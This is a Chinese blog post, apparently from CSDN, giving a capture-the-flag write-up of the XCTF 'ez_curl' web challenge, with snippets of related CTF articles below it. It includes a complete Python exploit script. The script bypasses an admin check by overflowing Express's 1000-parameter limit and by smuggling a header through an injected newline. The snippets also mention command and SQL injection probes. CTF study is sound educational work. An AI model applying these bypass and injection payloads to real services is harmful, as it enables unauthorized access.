攻防世界ez_curl

于 2024-08-06 15:44:19 发布
阅读量475 收藏 5
点赞数 3
文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54638628/article/details/140957585
版权

打开环境下载附件,得到源码

发现是Express框架,对源码进行代码审计

Express框架的特点是当我们传入的参数超过1000个时,之后的参数会被舍弃掉,输入"admin":"a"设置好admin的值,再加上999个没用的参数,把程序拼接的&admin=false挤掉,即可绕过过滤。

找到大佬们写的Python脚本

import requests
import json
from abc import ABC
from flask.sessions import SecureCookieSessionInterface
 
url = "http://61.147.171.105:50745/"  # 定义目标 URL
 
# 定义要发送的数据
datas = {
    "headers": ["xx:xx\nadmin: true", "Content-Type: application/json"],  # 请求头部信息
    "params": {"admin": "true"}  # 请求参数
}
 
# 向请求参数中添加 1020 个键值对
for i in range(1020):
    datas["params"]["x" + str(i)] = i
 
headers = {
    "Content-Type": "application/json"  # 定义 HTTP 头部信息,指定内容类型为 JSON
}
 
# 将数据转换为 JSON 格式
json1 = json.dumps(datas)
print(json1)  # 打印 JSON 数据
 
# 发送 POST 请求
resp = requests.post(url, headers=headers, data=json1)
 
# 打印响应内容
print(resp.content)

运行后得到flag

参考文章链接:攻防世界--lottery、ez_curl、ics-05_攻防世界lottery-CSDN博客

影瞬
关注
XCTF(攻防世界)—进阶web题Write Up(一)
Lemon's blog
08-20 1774
前言:这段时间做了一些XCTF的web进阶题,真的是学习到了很多知识,就来总结一下。 Cat 一开始以为是命令注入,恰好最近学习了命令注入,就先来测试一下: 输入127.0.0.1,发现是可以ping通的 输入127.0.0.1 | phpinfo() 或127.0.0.1 & net user就会显示: Invalid URL 看来命令注入的方法是行不通的(其他连接符也被过滤了,如...
CTF笔记 攻防世界 fakebook
qq_51248658的博客
10-10 1424
第一次做,拿到题目一开始就被注册难住了,blog该填啥???于是忍不住直接就去看wp了。。。。。。后面过了一段时间再去做发现,除了注册,后面还是没有思路,只是隐约记得有个反序列化。。。。这里就记一下,加深以下印像。第一次认真跟着大佬的wp一步步做下来,学到了很多,sql注入那里还是有些薄弱,判断闭合的时候总想不到直接空格,多积累吧。。。。
攻防世界--lottery、ez_curl、ics-05
最新发布
qq_75120258的博客
06-12 1066
array()函数是用来创建一个PHP数组json_decode :对 JSON 格式的字符串进行解码,转换为 PHP 变量。
【愚公系列】2023年06月 攻防世界-Web(ez_curl
时光隧道
06-13 6227
Express是一个流行的Node.js Web框架,它提供了许多有用的功能来构建Web应用程序。其中之一是参数解析,它允许开发者解析HTTP请求中的参数。Express提供了许多选项来配置参数解析。其中之一是parameterLimit选项。parameterLimit选项用于指定query string或者request payload的最大数量。默认情况下,它的值是1000。如果你的应用程序需要解析大量的查询字符串或者请求负载,你可能需要增加这个限制。
WEB:ez_curl
sleepywin的博客
07-21 422
第一点:来自源代码的这一行。当我们传入的参数超过1000个时,之后的参数会被舍弃掉。于是这里我们最开始发个"admin":"t"设置好admin的值,加上999个没用的参数,把程序拼接的&admin=false挤掉,即可绕过过滤。第二点:header 字段可以通过在每一行前面至少加一个SP 或 HT 来扩展到多行。以此绕过对 headers 的过滤。打开题目发现,进行代码审计。
HTTPGetPost.rar_c# post_c++ curl_curl_curl post_visual curl
07-14
curl SSL post访问curl SSL post访问
php7.3 php_curl.dll x64
04-16
windows下php7.3官方自带的php_curl.dll好像有问题,增加扩展curl经常失败
php_curl-5.4.3-VC9-x64的php_curl.dll
01-04
在windows上开发,下的是php_curl-5.4.3-VC9-x64版的wamp,在使用curl模块时出现错误,明明已经加载了,但是还是报curl没有加载的错误,后来在网上找了下,发现该版本的php_curl.dll有问题,于是又下载了份,覆盖掉...
攻防世界 -- very_easy_sql
weixin_48031371的博客
09-14 7674
攻防世界 -- very_easy_sql
攻防世界——fakebook
m0_62063669的博客
06-22 1874
攻防世界——fakebook /user.php.bak发现一个PHP文本,是说创建user然后从url里get信息,同时blog有一个正则匹配,需要有https://注册成功 点击username里的1url中有no=1,可以尝试一下,是否有注入(and 1=1不报错,and 1=2报错,所以存在sql注入) order by 4不报错,order by 5报错,所以有四个字段尝试查询数据库名,然后被拦截 尝试绕过,/**/可以绕过,发现2是回显点 得到当前数据库为fakebook ......
攻防世界之Web新手练习篇
m0_63944500的博客
11-19 2525
写给刚接触CTF的萌新,感谢支持,谨以此文献给去年的自己。
攻防世界web题目记录(一)
wanan的博客
10-06 3085
攻防世界web题目记录(一)
攻防世界】学习记录-web(系数4)
龟速更新的九某人
10-12 1528
攻防世界】学习记录-web(系数4) 0072 Cat 0097 Confusion1 0223 FlatScience 0992 题目名称-文件包含
攻防世界web-Cat
m0_68074153的博客
07-30 1042
攻防世界web-Cat
攻防世界】网鼎杯2018 Web fakebook
DG_s1mple
12-31 993
curl_init:初始化新的会话,返回 cURL 句柄,供curl_setopt()、 curl_exec() 和 curl_close() 函数使用。:会传入一个url值,就是我们输入的blog值,然后会curl这个url,把url返回的内容输出到页面上,curl是可以使用file协议来包含文件的。这里给了一个链接说是博客页面,猜测就是这里使用了curl获取页面,暂时还不知道怎么利用,我们再看看有没有什么能提供思路的地方。是一段序列化后的字符串,那思路就很明确了,我们需要反序列化他,传入恶意的代码。
攻防世界ezbypass-cat
wangzhemvp的博客
04-11 307
突然想到有可能是权限绕过的问题,因为以login开头的登录界面一般是白名单,原理简单来说就是访问白名单目录login.html,然后通过…/回到正常目录下,再访问flag.html。
攻防世界】Cat
wangzhemvp的博客
04-11 526
2.在url中输入%79,变成y 了。说明服务器对我们输入的内容会进行 url解码 并显示到url上。url 编码使用的是 16 进制,80 也就是 128,ASCII 码是从 0-127,所以传递。当且仅当文件中存在中文字符的时候,Django 才会报错导致获取文件内容。django编码方式为gbk,超过了ascii码范围就会报错。3.从报错信息中,要知道 Django 框架。1.知道是命令行,可以ping操作,可以。没反应,说明过滤了。4.通过报错,可以获取信息。当作绝对路径请求,来读取文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值